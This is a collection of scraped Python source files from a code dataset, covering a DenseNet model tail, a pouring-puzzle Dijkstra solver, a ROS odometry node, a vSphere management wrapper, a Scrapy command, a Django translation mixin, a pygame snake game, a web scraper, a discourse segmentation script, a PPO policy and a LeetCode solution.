\n # imagenet : 7 x 7 x num_classes \n # others : 8 x 8 x num_classes\n end_point = 'lastconvolution'\n net = bn_act_conv_drp(net, num_classes, [1, 1], scope=end_point)\n end_points[end_point] = net\n\n # Global Average Pooling £º 1 x 1 x num_classes\n end_point = 'GlobalPool'\n net = tf.reduce_mean(net, [1, 2], keep_dims=True, name=end_point)\n end_points[end_point] = net\n \n # squeeze\n end_point = 'squeeze'\n logits = tf.squeeze(net, [1, 2], name=end_point)\n end_points[end_point] = logits\n \n # classification\n end_point = \"predictions\" \n end_points[end_point] = slim.softmax(logits, scope=end_point)\n \n\n ###########This is the end line of my code###############\n\n return logits, end_points\n\ndef bn_drp_scope(is_training=True, keep_prob=0.8):\n keep_prob = keep_prob if is_training else 1\n with slim.arg_scope(\n [slim.batch_norm],\n scale=True, is_training=is_training, updates_collections=None):\n with slim.arg_scope(\n [slim.dropout],\n 
is_training=is_training, keep_prob=keep_prob) as bsc:\n return bsc\n\n# Add biases_initializer\ndef densenet_arg_scope(weight_decay=0.0001):\n \"\"\"Defines the default densenet argument scope.\n\n Args:\n weight_decay: The weight decay to use for regularizing the model.\n\n Returns:\n An `arg_scope` to use for the densenet model.\n \"\"\"\n with slim.arg_scope(\n [slim.conv2d],\n weights_initializer=tf.contrib.layers.variance_scaling_initializer(\n factor=2.0, mode='FAN_IN', uniform=False),\n weights_regularizer=slim.l2_regularizer(weight_decay),\n activation_fn=None, biases_initializer=tf.zeros_initializer(), padding='SAME',\n stride=1) as sc:\n return sc\n\n\ndensenet.default_image_size = 224\n","sub_path":"nets/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":12339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363003357","text":"from optparse import OptionParser\nfrom random import randint\nimport random\nimport sys\nimport io\nimport numpy as np\n#import statprof\n#from contextlib import contextmanager\nimport heapq\n\n\n#@contextmanager\n#def stat_profiler():\n #statprof.start()\n #yield statprof\n #statprof.stop()\n #statprof.display()\n\n\nclass State:\n def __init__(self, i, j, spill, cost):\n self.i, self. j = i, j\n # spill from i to j ( how the state is formed efectively give parent state)\n self.spill = spill\n # n liters to spill from i to j\n self.cost = cost\n # cost of the state\n\nclass ImplicitDijkstra:\n def __init__(self, in_stream):\n n_containers = int(in_stream.readline())\n self.volumes = [int(in_stream.readline()) for _ in range(n_containers)]\n\n self.states = {}\n self.queue = []\n\n\n def pour(self, volumes, prev_cost, i, j):\n new_volumes = list(volumes)\n free = self.volumes[j] - new_volumes[j]\n spill = min(free, new_volumes[i])\n new_volumes[i] -= spill\n new_volumes[j] += spill\n new_volumes = tuple(new_volumes)\n new_cost = (prev_cost[0] + spill, prev_cost[1] + 1)\n new_state = State(i, j, spill, new_cost)\n\n if new_volumes not in self.states or new_state.cost < self.states[new_volumes].cost:\n self.add(new_volumes, new_state)\n return True\n else:\n return False\n\n def add(self, new_volumes, new_state):\n self.states[new_volumes] = new_state\n heapq.heappush(self.queue, (new_state.cost, new_volumes))\n\n def run_dijkstra(self):\n i_fill = max(range(len(self.volumes)), key=self.volumes.__getitem__)\n self.results = (self.volumes[i_fill] + 1) * [None]\n self.n_results = 0\n\n volumes = len(self.volumes) * [0]\n volumes[i_fill] = self.volumes[i_fill]\n volumes = tuple(volumes)\n cost = (0, 0)\n state = State(i_fill, i_fill, self.volumes[i_fill], cost)\n self.add(volumes, state)\n\n while self.queue and self.n_results < len(self.results):\n cost, volumes = heapq.heappop(self.queue)\n state = self.states[volumes]\n if state.cost < cost:\n # skip closed states\n continue\n\n # New states can be obtained only by interacting with vessels that have been changed recently.\n # Should be possible to reduce l to [state.i, state.j], but that way I loose some states, not\n # know why exactly.\n for l in range(len(self.volumes)):\n for k in range(len(self.volumes)):\n if k != l: #state.i and k != state.j:\n self.pour(volumes, cost, l, k)\n #self.pour(volumes, cost, k, l)\n #if k not in {state.i, state.j} and l not in {state.i, state.j}:\n # sys.stderr.write(\"kl: {} {} ij: {} {} volumes: {}\\n\".format(k,l, state.i, state.j, str(volumes)))\n\n # Final distance to current state: check 
and save results\n if self.results[volumes[state.i]] is None:\n self.results[volumes[state.i]] = volumes\n self.n_results += 1\n\n if self.results[volumes[state.j]] is None:\n self.results[volumes[state.j]] = volumes\n self.n_results += 1\n\n sys.stderr.write(\"#states: {}\\n\".format(len(self.states)))\n\n def get_path(self, volumes):\n path = []\n cost = 0\n state = self.states[tuple(volumes)]\n orig_cost = state.cost\n while state.i != state.j:\n #path.append((state.i, state.j, tuple(volumes)))\n path.append((state.i, state.j))\n cost += state.spill\n volumes[state.i] += state.spill\n volumes[state.j] -= state.spill\n state = self.states[tuple(volumes)]\n assert orig_cost == (cost, len(path))\n return list(reversed(path)), cost\n\n def output_results(self, stream):\n for vol, res in enumerate(self.results[1:]):\n if res is None:\n stream.write(\"{}\\n\".format(vol+1))\n else:\n path, cost = self.get_path(list(res))\n stream.write(\"{} {} {}\\n\".format(\n vol+1, cost, len(path)))\n # for i,j in path:\n # stream.write(\" {}>{}\\n\".format(i, j))\n\ndef solve(in_stream, out_stream):\n dijkstra = ImplicitDijkstra(in_stream)\n dijkstra.run_dijkstra()\n dijkstra.output_results(out_stream)\n\n\ndef make_data(in_stream, problem_size):\n size = problem_size\n max_vol = int( size ** 0.3)\n volumes = []\n while size > 2:\n vol = randint(2, max_vol)\n volumes.append(vol)\n size = size / vol\n problem_setup = io.StringIO()\n problem_setup.write(\"{}\\n\".format(len(volumes)))\n for v in volumes:\n problem_setup.write(\"{}\\n\".format(v))\n\n #sys.stdout.write(problem_setup.getvalue())\n #print(\"====\")\n out_stream = io.StringIO()\n problem_setup.seek(0)\n solve(problem_setup, out_stream)\n\n #sys.stderr.write(out_stream.getvalue())\n #print(\"====\")\n\n #res_stream = StringIO.StringIO()\n #segment.image_to_stream(res_stream, head=False)\n #assert (out_stream.getvalue() == res_stream.getvalue())\n\n in_stream.write(problem_setup.getvalue())\n\n\n'''\nMain script body.\n'''\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--problem-size\", dest=\"size\", help=\"Problem size.\", default=None)\nparser.add_option(\"-v\", \"--validate\", action=\"store_true\", dest=\"validate\", help=\"program size\", default=None)\nparser.add_option(\"-r\", dest=\"rand\", default=False, help=\"Use non-deterministic algo\")\n\noptions, args = parser.parse_args()\n\n\nif options.rand:\n random.seed(options.rand)\nelse:\n random.seed(options.size)\n\nif options.size is not None:\n make_data(sys.stdout, int(options.size))\nelse:\n solve(sys.stdin, sys.stdout)\n","sub_path":"2019/problems/MINSPILL/minspill.py","file_name":"minspill.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432245522","text":"#!/usr/bin/python\n\nimport tf\nimport rospy\nfrom gazebo_msgs.msg import ModelStates\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import TwistWithCovariance\nfrom geometry_msgs.msg import PoseWithCovariance\nimport numpy as np\n\nclass OdometryPublisher:\n\tdef __init__(self):\n\t\trospy.init_node('OdometryPublisher')\n\t\t#self.odometry_pub = rospy.Publisher(rospy.get_namespace()+'odom',Odometry,queue_size=1)\n\t\tself.odometry_pub = rospy.Publisher('/odom',Odometry,queue_size=1)\n\t\tself.model_state_sub = rospy.Subscriber('/gazebo/model_states',ModelStates,self.publish_odometry)\n\n\n\tdef publish_odometry(self,msg):\n\t\tself.msg = msg\n\t\tfor i in 
xrange(0,len(msg.name)):\n\t\t\tif(msg.name[i]==rospy.get_namespace()[1:len(rospy.get_namespace())-1]):\n\t\t\t\tpose = PoseWithCovariance()\n\t\t\t\ttwist = TwistWithCovariance()\n\t\t\t\tpose.pose = msg.pose[i]\n\t\t\t\tpose.pose.position.z=0\n\n\t\t\t\ttwist.twist.angular.z = msg.twist[i].angular.z\n\n\t\t\t\trot_matrix = tf.transformations.quaternion_matrix([msg.pose[i].orientation.x,msg.pose[i].orientation.y,msg.pose[i].orientation.z,msg.pose[i].orientation.w])\n\t\t\t\tlin_vel = np.matrix([msg.twist[i].linear.x,msg.twist[i].linear.y,msg.twist[i].linear.z])\n\n\t\t\t\tmy_vel = rot_matrix[0:3,0:3].T*lin_vel.T\n\n\t\t\t\txdot = my_vel.tolist()[0][0]\n\n\t\t\t\ttwist.twist.linear.x = xdot\n\n\t\t\t\t# Fill the Odometry message\n\t\t\t\todom_msg = Odometry()\n\t\t\t\todom_msg.pose = pose\n\t\t\t\todom_msg.twist = twist\n\t\t\t\todom_msg.header.frame_id='/odom'\n\t\t\t\todom_msg.child_frame_id=msg.name[i]\n\t\t\t\todom_msg.header.stamp = rospy.Time.now()\n\n\t\t\t\t# Publish the Odometry message\n\t\t\t\t#self.odometry_pub.publish(odom_msg)\n\n\nif __name__=='__main__':\n\tpublisher = OdometryPublisher()\n\trospy.spin()\n","sub_path":"momapbot/momapbot_gazebo/src/odometrypublisher.py","file_name":"odometrypublisher.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"227784331","text":"import ssl, collections, time\r\n\r\nfrom pyVmomi import vim, vmodl\r\nfrom pyVim.connect import SmartConnect, Disconnect\r\n\r\n\r\nclass vCenter(object):\r\n NEVER_CLOSE = -1\r\n\r\n @property\r\n def serviceContent(self):\r\n return self.__serviceContent\r\n \r\n def __init__(self, server, user, pw):\r\n try:\r\n s = ssl.SSLContext()\r\n s.verify_mode = ssl.CERT_NONE\r\n self.__serviceInstance = SmartConnect(\r\n host = server,\r\n user = user,\r\n pwd = pw,\r\n connectionPoolTimeout = vCenter.NEVER_CLOSE,\r\n sslContext = s\r\n )\r\n self.__serviceContent = self.__serviceInstance.RetrieveContent()\r\n self.__searchIndex = self.__serviceContent.searchIndex\r\n self.__rootFolder = self.__serviceContent.rootFolder\r\n self.__viewManager = self.__serviceContent.viewManager\r\n except vmodl.MethodFault as fault:\r\n raise Exception(fault.msg)\r\n except Exception:\r\n raise\r\n\r\n @property\r\n def sessionsNum(self):\r\n if self.__serviceContent:\r\n return len(self.__serviceContent.sessionManager.sessionList)\r\n else:\r\n return None\r\n\r\n def __del__(self):\r\n try:\r\n Disconnect(self.__serviceInstance)\r\n except vmodl.MethodFault:\r\n raise\r\n except Exception:\r\n raise\r\n\r\n def _findAllObjByType(self, vimtype, folder = None):\r\n try:\r\n if folder is None:\r\n folder = self.__rootFolder\r\n container = self.__viewManager.CreateContainerView(folder, vimtype, True)\r\n obj_list = container.view\r\n except vmodl.MethodFault:\r\n raise\r\n except Exception:\r\n raise \r\n return obj_list\r\n\r\n def findObjByName(self, name, objSet = None, vimtype = None):\r\n \"\"\"If there are multiple object with the same name, \r\n this method will return the first one it found\"\"\"\r\n if objSet is None:\r\n objSet = self.__rootFolder\r\n result = None\r\n obj_list = None\r\n if isinstance(objSet, vim.Folder):\r\n if vimtype is None:\r\n raise Exception(\"vimtype is None, it must be specified to find in a folder\")\r\n obj_list = self._findAllObjByType(vimtype, objSet)\r\n elif isinstance(objSet, collections.Iterable):\r\n obj_list = objSet\r\n for obj in obj_list:\r\n if obj.name == name:\r\n result = obj\r\n 
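# as the docstring warns, names need not be unique in the inventory;\r\n # keep the first match and stop scanning\r\n 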
break\r\n return result\r\n\r\n def findObjByInventoryPath(self, path):\r\n \"\"\"For VM, path should be //vm/\"\"\"\r\n result = self.__searchIndex.FindByInventoryPath(path)\r\n return result\r\n\r\n def findAvailableDatacenters(self, folder = None):\r\n available_dcs = self._findAllObjByType([vim.Datacenter], folder)\r\n return available_dcs\r\n\r\n def findAvailableHosts(self, datacenter):\r\n dc = self.findObjByName(datacenter, vimtype = [vim.Datacenter])\r\n available_hosts = self._findAllObjByType([vim.HostSystem], dc.hostFolder)\r\n return available_hosts\r\n\r\n def findAvailableDatastoresForHost(self, host_name):\r\n host = self.findObjByName(host_name, vimtype = [vim.HostSystem])\r\n return host.datastore\r\n\r\n def findAvailableNetworkForHost(self, host_name):\r\n host = self.findObjByName(host_name, vimtype = [vim.HostSystem])\r\n return host.network\r\n\r\n def findVmByBiosUuid(self, biosuuid, datacenter = None):\r\n result = self.__searchIndex.FindByUuid(datacenter, biosuuid, True, False)\r\n return result\r\n\r\n def findVmByInstanceUuid(self, instanceuuid, datacenter = None):\r\n result = self.__searchIndex.FindByUuid(datacenter, instanceuuid, True, True)\r\n return result\r\n\r\n def findVmByComputerName(self, computername, datacenter = None):\r\n result = self.__searchIndex.FindByDnsName(datacenter, computername, True)\r\n return result\r\n\r\n def findVmByIp(self, ip, datacenter = None):\r\n result = self.__searchIndex.FindByIp(datacenter, ip, True)\r\n return result\r\n\r\n def getshareStore(self,type,name=None):\r\n obj=None\r\n container=self.__serviceContent.viewManager.CreateContainerView(self.__serviceContent.rootFolder,type,True)\r\n if name:\r\n for view in container.view:\r\n if view.name==name:\r\n obj=view\r\n return [obj]\r\n else:\r\n return container.view\r\n\r\nclass Host(object):\r\n @property\r\n def instance(self):\r\n return self.__instance\r\n\r\n @instance.setter\r\n def instance(self, value):\r\n if not isinstance(value, vim.HostSystem):\r\n raise ValueError('instance must be a vim.HostSystem')\r\n self.__instance = value\r\n self.__hardware = self.__instance.hardware\r\n self.__stats = self.__instance.summary.quickStats\r\n\r\n @property\r\n def name(self):\r\n if self.__instance:\r\n return self.__instance.name\r\n\r\n @property\r\n def id(self):\r\n if self.__instance:\r\n return int(self.__instance._moId.split('-')[1])\r\n\r\n @property\r\n def cpu_hz(self):\r\n if self.__instance:\r\n return self.__hardware.cpuInfo.numCpuCores * self.__hardware.cpuInfo.hz\r\n\r\n @property\r\n def cpu_usage_mhz(self):\r\n if self.__stats:\r\n return self.__stats.overallCpuUsage\r\n\r\n @property\r\n def memory_bytes(self):\r\n if self.__hardware:\r\n return self.__hardware.memorySize\r\n\r\n @property\r\n def memory_usage_mb(self):\r\n if self.__stats:\r\n return self.__stats.overallMemoryUsage\r\n\r\nclass VirtualMachine(object):\r\n \r\n @property\r\n def instance(self):\r\n return self.__instance\r\n\r\n @instance.setter\r\n def instance(self, value):\r\n if not isinstance(value, vim.VirtualMachine):\r\n raise ValueError('instance must be a vim.VirtualMachine')\r\n self.__instance = value\r\n\r\n @property\r\n def name(self):\r\n if self.__instance:\r\n return self.__instance.name\r\n\r\n @property\r\n def powerState(self):\r\n if self.__instance:\r\n return self.__instance.runtime.powerState\r\n else:\r\n return None\r\n\r\n @property\r\n def instance_uuid(self):\r\n if self.__instance:\r\n return self.__instance.config.instanceUuid\r\n else:\r\n return 
None\r\n\r\n @property\r\n def bios_uuid(self):\r\n if self.__instance:\r\n return self.__instance.config.uuid\r\n else:\r\n return None\r\n\r\n @property\r\n def isTemplate(self):\r\n if self.__instance:\r\n return self.__instance.config.template\r\n else:\r\n return None\r\n\r\n @property\r\n def datastore(self):\r\n if self.__instance:\r\n return self.__instance.datastore\r\n else:\r\n return None\r\n\r\n @property\r\n def current_snapshot(self):\r\n if self.__instance and self.__instance.snapshot:\r\n return self.__instance.snapshot.currentSnapshot\r\n else:\r\n return None\r\n\r\n def getSnapshotByName(self, snapshot_name, snapshotList = None):\r\n target = None\r\n if self.__instance.snapshot is None:\r\n return target\r\n if snapshotList is None:\r\n snapshotList = self.__instance.snapshot.rootSnapshotList\r\n for snap in snapshotList:\r\n if snap.name == snapshot_name:\r\n target = snap.snapshot\r\n break\r\n elif snap.childSnapshotList:\r\n # capture the recursive result; it was previously discarded\r\n target = self.getSnapshotByName(snapshot_name, snap.childSnapshotList)\r\n if target is not None:\r\n break\r\n return target\r\n\r\n def __wait_for_vm_task_result(self, task):\r\n while True:\r\n if task.info.state in [vim.TaskInfo.State.running, vim.TaskInfo.State.queued]:\r\n pass\r\n elif task.info.state == vim.TaskInfo.State.success:\r\n return 0, task.info.result\r\n elif task.info.state == vim.TaskInfo.State.error:\r\n return 1, task.info.error.msg\r\n time.sleep(5)\r\n\r\n def powerOn(self):\r\n if self.__instance and self.powerState != vim.VirtualMachine.PowerState.poweredOn:\r\n return self.__wait_for_vm_task_result(self.__instance.PowerOnVM_Task())\r\n\r\n def powerOff(self):\r\n if self.__instance and self.powerState != vim.VirtualMachine.PowerState.poweredOff:\r\n return self.__wait_for_vm_task_result(self.__instance.PowerOffVM_Task())\r\n\r\n def suspend(self):\r\n if self.__instance and self.powerState == vim.VirtualMachine.PowerState.poweredOn:\r\n return self.__wait_for_vm_task_result(self.__instance.SuspendVM_Task())\r\n\r\n def removeAllSnapshots(self):\r\n return self.__wait_for_vm_task_result(self.__instance.RemoveAllSnapshots_Task())\r\n\r\n def clone(self, folder, name, host = None, datastore = None, snapshot_name = None, poweron = False, template = False):\r\n clone_spec = vim.vm.CloneSpec()\r\n # Specifies the location of resources the newly cloned virtual machine will use\r\n relocate_spec = vim.vm.RelocateSpec()\r\n relocate_spec.host = host\r\n relocate_spec.datastore = datastore\r\n\r\n # Get the snapshot for linked clone\r\n base_snapshot = self.getSnapshotByName(snapshot_name) if snapshot_name else self.current_snapshot\r\n if base_snapshot is not None:\r\n clone_spec.snapshot = base_snapshot\r\n relocate_spec.diskMoveType = \"createNewChildDiskBacking\"\r\n clone_spec.location = relocate_spec\r\n\r\n # Don't retain a copy of the source vm's memory state in the clone\r\n clone_spec.memory = False\r\n clone_spec.powerOn = poweron\r\n clone_spec.template = template\r\n return self.__wait_for_vm_task_result(self.__instance.CloneVM_Task(folder, name, clone_spec))\r\n\r\n def setConfigParams(self, configParams):\r\n if self.__instance\\\r\n and not self.isTemplate\\\r\n and self.powerState == vim.VirtualMachine.PowerState.poweredOff:\r\n config_spec = vim.vm.ConfigSpec()\r\n config_spec.extraConfig = []\r\n \r\n for key, value in configParams.items():\r\n options = vim.option.OptionValue()\r\n options.key = key\r\n options.value = value\r\n config_spec.extraConfig.append(options)\r\n\r\n return 
self.__wait_for_vm_task_result(self.__instance.ReconfigVM_Task(config_spec))\r\n\r\n def delete(self):\r\n if self.powerState == vim.VirtualMachinePowerState.poweredOn:\r\n self.powerOff()\r\n return self.__wait_for_vm_task_result(self.__instance.Destroy_Task())","sub_path":"KasonPython/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217587300","text":"from scrapy.commands.crawl import Command\nfrom scrapy.exceptions import UsageError\n# from scrapy.extensions.closespider import CloseSpider\n# from scrapy.exceptions import CloseSpider\n\n\nclass CrawlCommand(Command):\n def run(self, args, opts):\n if len(args) < 1:\n raise UsageError()\n elif len(args) > 1:\n raise UsageError(\"running 'scrapy crawl' with more than one spider is no longer supported\")\n spname = args[0]\n\n self.crawler_process.crawl(spname, **opts.spargs)\n\n crawler = list(self.crawler_process.crawlers)[0]\n crawler.stats.set_value('exit_code', 0)\n\n self.crawler_process.start()\n\n exitcode = crawler.stats.get_value('exit_code')\n if exitcode != 0:\n if isinstance(exitcode, int):\n self.exitcode = exitcode\n else:\n self.exitcode = 1\n","sub_path":"GGScrapy/commands/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"623786584","text":"from django.db.models import signals\nimport handler\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\nfrom django.utils.translation import activate, deactivate\nfrom django.db import models\n\nsignals.post_init.connect(handler.post_init)\n\n\nclass TranslationModel(models.Model):\n def __init__(self, *args, **kwargs):\n\n _languages = dict(filter(lambda x: x[0] != getattr(settings, 'LINGUA_DEFAULT', 'en'),\n getattr(settings, 'LANGUAGES', ())))\n translation_fields = tuple([x for x in [x.lower() for x in self._translation_fields if '__' not in x]])\n\n def _getattr(klass, name):\n if '_' in name:\n lang, v = name.split('_')[::-1][0], '_'.join(name.split('_')[:-1])\n\n if lang in _languages:\n activate(lang)\n value = unicode(_(getattr(klass, v)))\n deactivate()\n\n return value\n return klass.__class__.__getattribute__(klass, name)\n\n self.__class__.add_to_class('_translation_fields', translation_fields)\n self.__class__.add_to_class('_languages', _languages)\n self.__class__.add_to_class('__getattr__', _getattr)\n\n super(TranslationModel, self).__init__(*args, **kwargs)\n\n class Meta:\n abstract = True\n","sub_path":"lingua/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"455375004","text":"from pygame import display, init, time as pytime, font, draw, event, quit as pyquit\nfrom pygame import QUIT, KEYDOWN, K_LEFT, K_RIGHT, K_DOWN, K_UP, K_s, K_j\nimport random\nfrom PIL import ImageColor\n\ninit()\n\nbranco = ImageColor.getrgb(\"white\")\namarelo = ImageColor.getrgb(\"yellow\")\npreto = ImageColor.getrgb(\"black\")\nvermelho = ImageColor.getrgb(\"red\")\nverde = ImageColor.getrgb(\"green\")\nazul = ImageColor.getrgb(\"blue\")\n\nlargura = 600\naltura = 400\n\ndis = display.set_mode((largura, altura))\ndisplay.set_caption(\"JOGO\")\n\nclock = pytime.Clock()\nsnake_body = 10\n\nscore = lambda s : dis.blit(\n font.SysFont(\"arial.ttf\", 
35).render(\n f\"Pontuação: {s-1}\", True, azul\n ), [0,0]\n )\n\nmessage = lambda m, c, pos : dis.blit(\n font.SysFont(\n \"segol UI\"\n , 25\n ).render(m,True,c)\n , pos\n )\n\ncriar_comida = lambda esp, pos : round(random.randrange(esp, pos - 10)/10)*10\n\ndef jogo():\n game_over = False\n fechar = False\n\n x1 = largura/2\n y1 = altura/2\n\n x1_change = 0\n y1_change = 0\n\n corpo = []\n tamanho = 1\n level = 10\n\n comida_x = criar_comida(0, largura)\n comida_y = criar_comida(30, altura)\n\n while not game_over:\n while fechar:\n dis.fill(branco)\n message(\"Aperte J para jogar ou S para sair.\", preto, [50,100])\n score(tamanho)\n display.update()\n\n for e in event.get():\n if e.type == KEYDOWN:\n if e.type == QUIT:\n game_over = True\n fechar = False\n if e.key == K_s:\n game_over = True\n fechar = False\n if e.key == K_j:\n jogo()\n\n for e in event.get():\n if e.type == QUIT:\n game_over = True\n if e.type == KEYDOWN:\n if e.key == K_LEFT:\n x1_change =- snake_body\n y1_change = 0\n if e.key == K_RIGHT:\n x1_change = snake_body\n y1_change = 0\n if e.key == K_UP:\n y1_change =- snake_body\n x1_change = 0\n if e.key == K_DOWN:\n y1_change = snake_body\n x1_change = 0\n\n if any([x1>=largura, x1<0, y1>=altura, y1<0]):\n fechar = True\n\n x1 += x1_change\n y1 += y1_change\n dis.fill(branco)\n draw.rect(dis, vermelho, [comida_x, comida_y, snake_body, snake_body])\n cabeca = []\n cabeca.append(x1)\n cabeca.append(y1)\n corpo.append(cabeca)\n if len(corpo) > tamanho:\n del corpo[0]\n\n for x in corpo[:-1]:\n if x == cabeca:\n fechar = True\n\n [draw.rect(dis, verde, [x[0], x[1], snake_body, snake_body]) for x in corpo]\n score(tamanho)\n\n if x1 == comida_x and y1 == comida_y:\n comida_x = criar_comida(0, largura)\n comida_y = criar_comida(30, altura)\n tamanho += 1\n level += 2\n clock.tick(level)\n\n pyquit()\n quit()\n\njogo()\n","sub_path":"JOGO_CLASSICO.py","file_name":"JOGO_CLASSICO.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444051886","text":"import requests, re \nimport lxml \nimport urllib3\nfrom bs4 import BeautifulSoup \nagents = {\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n}\n\ndef scrape(url):\n\tget_page_data = requests.get(url, headers=agents)\n\treturn BeautifulSoup(get_page_data.text, 'lxml')\n\nsoup = scrape('https://techcrunch.com/')\n\ndata = soup.findAll('a')[:2]\nfor d in data:\n\tif 'href' in d.attrs:\n\t\tprint(d.attrs['href'])\n\n# # lambda expression\n# data = soup.findAll(lambda tag: len(tag.attrs) == 2)[:2]\n# print(data)\n# regular expression\n# images = soup.findAll('img',{'src': re.compile('\\.\\.\\/img\\/gifts\\/img.*\\.jpg')})\n# for i in images:\n# \tprint(i[\"src\"])","sub_path":"study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488704586","text":"#!/usr/bin/env python3\n# License: MIT\n\n'''\nA discourse segmenter following the Base model from this paper:\nNgo Xuan Bach, Nguyen Le Minh, Akira Shimazu. 2012.\nA Reranking Model for Discourse Segmentation using Subtree Features.\nSIGDIAL. 
http://aclweb.org/anthology//W/W12/W12-1623.pdf.\n\nThe output can be fed into CRF++ to train a model\nwith tune_segmentation_model.py.\n'''\n\nimport argparse\nimport json\nfrom discourseparsing.discourse_segmentation \\\n import extract_segmentation_features\n\n\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n 'input_path', help='JSON file from convert_rst_discourse_tb.py')\n parser.add_argument(\n 'output_path', help='TSV output file to be used by crf++')\n args = parser.parse_args()\n\n with open(args.input_path) as f:\n data = json.load(f)\n\n with open(args.output_path, 'w') as outfile:\n for doc in data:\n feat_lists_doc, labels_doc = extract_segmentation_features(doc)\n for feat_lists_sent, labels_sent in zip(feat_lists_doc, labels_doc):\n for feat_list, label in zip(feat_lists_sent, labels_sent):\n print('\\t'.join(feat_list + [label]), file=outfile)\n # blank lines between sentences (and documents)\n print(file=outfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"discourseparsing/extract_segmentation_features.py","file_name":"extract_segmentation_features.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463339709","text":"import tensorflow as tf\nimport numpy as np\nfrom distributions import DiagGaussian\nfrom networks import MLP\nfrom optimizers import ClipPPO\n\nclass GaussianMLPPolicy:\n def __init__(\n self,\n name,\n ob_dim,\n action_dim,\n learn_vars=True,\n var_network=False, # NN if true, else trainable params indep of obs\n out_activation=None,\n hidden_dims=[64, 64, 64],\n hidden_activation=tf.nn.tanh,\n weight_init=tf.contrib.layers.xavier_initializer,\n bias_init=tf.zeros_initializer,\n optimizer=ClipPPO\n ):\n with tf.variable_scope(name):\n self.obs = tf.placeholder(tf.float32, shape=[None, ob_dim], name='obs')\n\n # policy net\n self.mean_network = MLP('means', ob_dim, action_dim, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.means = self.mean_network.layers['out']\n\n if learn_vars:\n if var_network:\n self.log_var_network = MLP('log_vars', ob_dim, action_dim, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.log_vars = self.log_var_network.layers['out']\n else:\n self.log_vars = tf.get_variable('log_vars', trainable=True, initializer=-np.ones((1, action_dim), dtype=np.float32))\n else:\n self.log_vars = tf.get_variable('log_vars', trainable=False, initializer=np.zeros((1, action_dim), dtype=np.float32))\n\n self.distribution = DiagGaussian(self.means, self.log_vars)\n self.sampled_actions = self.distribution.sample()\n\n self.actions = tf.placeholder(tf.float32, shape=[None, action_dim], name='actions')\n self.action_log_probs = self.distribution.log_prob(self.actions)\n self.entropies = self.distribution.entropy()\n\n # value net\n self.value_network = MLP('values', ob_dim, 1, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.values = self.value_network.layers['out']\n\n # training, PPO for now\n self.optimizer = optimizer(ob_dim, action_dim, self)\n\n def act(self, obs, global_session):\n actions = global_session.run(\n 
self.sampled_actions,\n feed_dict={self.obs: obs}\n )\n return actions\n\n def rollout_data(self, obs, actions, global_session):\n action_log_probs, values, entropies = global_session.run(\n [self.action_log_probs, self.values, self.entropies],\n feed_dict={self.obs: obs, self.actions: actions}\n )\n return action_log_probs, values, entropies\n","sub_path":"policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"493104554","text":"#\r\n# [63] Unique Paths II\r\n#\r\n# https://leetcode.com/problems/unique-paths-ii\r\n#\r\n# Medium (31.50%)\r\n# Total Accepted: \r\n# Total Submissions: \r\n# Testcase Example: '[[0]]'\r\n#\r\n# Follow up for \"Unique Paths\":\r\n#\r\n# Now consider if some obstacles are added to the grids. How many unique paths\r\n# would there be?\r\n#\r\n# An obstacle and empty space is marked as 1 and 0 respectively in the grid.\r\n#\r\n# For example,\r\n# There is one obstacle in the middle of a 3x3 grid as illustrated below.\r\n#\r\n# [\r\n# [0,0,0],\r\n# [0,1,0],\r\n# [0,0,0]\r\n# ]\r\n#\r\n# The total number of unique paths is 2.\r\n#\r\n# Note: m and n will be at most 100.\r\n#\r\n\r\n\r\nclass Solution(object):\r\n def uniquePathsWithObstacles(self, obstacleGrid):\r\n \"\"\"\r\n :type obstacleGrid: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n if not obstacleGrid or obstacleGrid[0][0] == 1:\r\n return 0\r\n\r\n m = len(obstacleGrid)\r\n n = len(obstacleGrid[0])\r\n dp = [[1] * n for _ in range(m)]\r\n\r\n for i in range(1, m):\r\n dp[i][0] = 0 if obstacleGrid[i][0] else dp[i - 1][0]\r\n for j in range(1, n):\r\n dp[0][j] = 0 if obstacleGrid[0][j] else dp[0][j - 1]\r\n\r\n for i in range(1, m):\r\n for j in range(1, n):\r\n dp[i][j] = 0 